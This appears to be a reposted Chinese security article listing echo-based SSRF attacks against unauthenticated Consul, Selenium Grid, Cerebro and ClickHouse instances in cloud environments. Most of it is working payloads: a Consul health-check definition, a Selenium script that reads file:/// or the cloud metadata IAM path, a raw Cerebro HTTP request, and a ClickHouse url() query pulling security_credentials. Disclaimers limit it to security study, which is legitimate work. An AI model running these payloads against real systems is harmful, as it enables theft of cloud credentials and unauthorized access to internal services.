扫码领资料
获网安教程
常见未授权下的回显 SSRF 攻击面
Grafana
Consul
{ "id": "redis-1", "name": "Redis health check", "http": "http://xxxx/latest/iam/security_credentials", "tls_skip_verify": false, "method": "GET", "interval": "10s", "timeout": "1s" }
查看服务 health checks 即可查看 ssrf 回显内容
Selenium Gird
from selenium import webdriver
url='http://xxxxxxx:4444/wd/hub'
chrome_options = webdriver.ChromeOptions()
chrome_options.add_argument('--no-sandbox')
chrome_options.add_argument('-ignore-certificate-errors')
chrome_options.add_argument('--allow-file-access-from-files')
dr = webdriver.Remote(url, options=chrome_options)
dr.set_page_load_timeout(3)
dr.get('file:///')
#dr.get('http://xxxxx/latest/iam/')
print(dr.page_source)
Cerebro
存在两个接口可以利用,首页/connect 连接 es接口,无回显,不在此处列出
进入功能页面,存在一个 rest查询接口,页面功能如下:
POST /rest/request HTTP/1.1
Host: xxxxx:9000
Content-Length: 76
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Content-Type: application/json;charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: SESSION=a479fcb2-d259-4833-bc88-c7cb1c896044; JSESSIONID=FF77ABF1DDD1AF7697078904978F866A
Connection: close
{"method":"GET","data":{},"path":"","host":"http://10.0.0.142:18801/health"}
Clickhouse
以下sql 语句即可实现回显 ssrf,
SELECT * FROM url('http://xxxxx/latest/iam/security_credentials/','TabSeparated','a String','auto');
文章来源: https://xz.aliyun.com/t/13757
文章作者:1385381089376334
如有侵权,联系删除
声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。
原文始发于微信公众号(白帽子左一):云攻防中常见未授权下的回显 SSRF
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论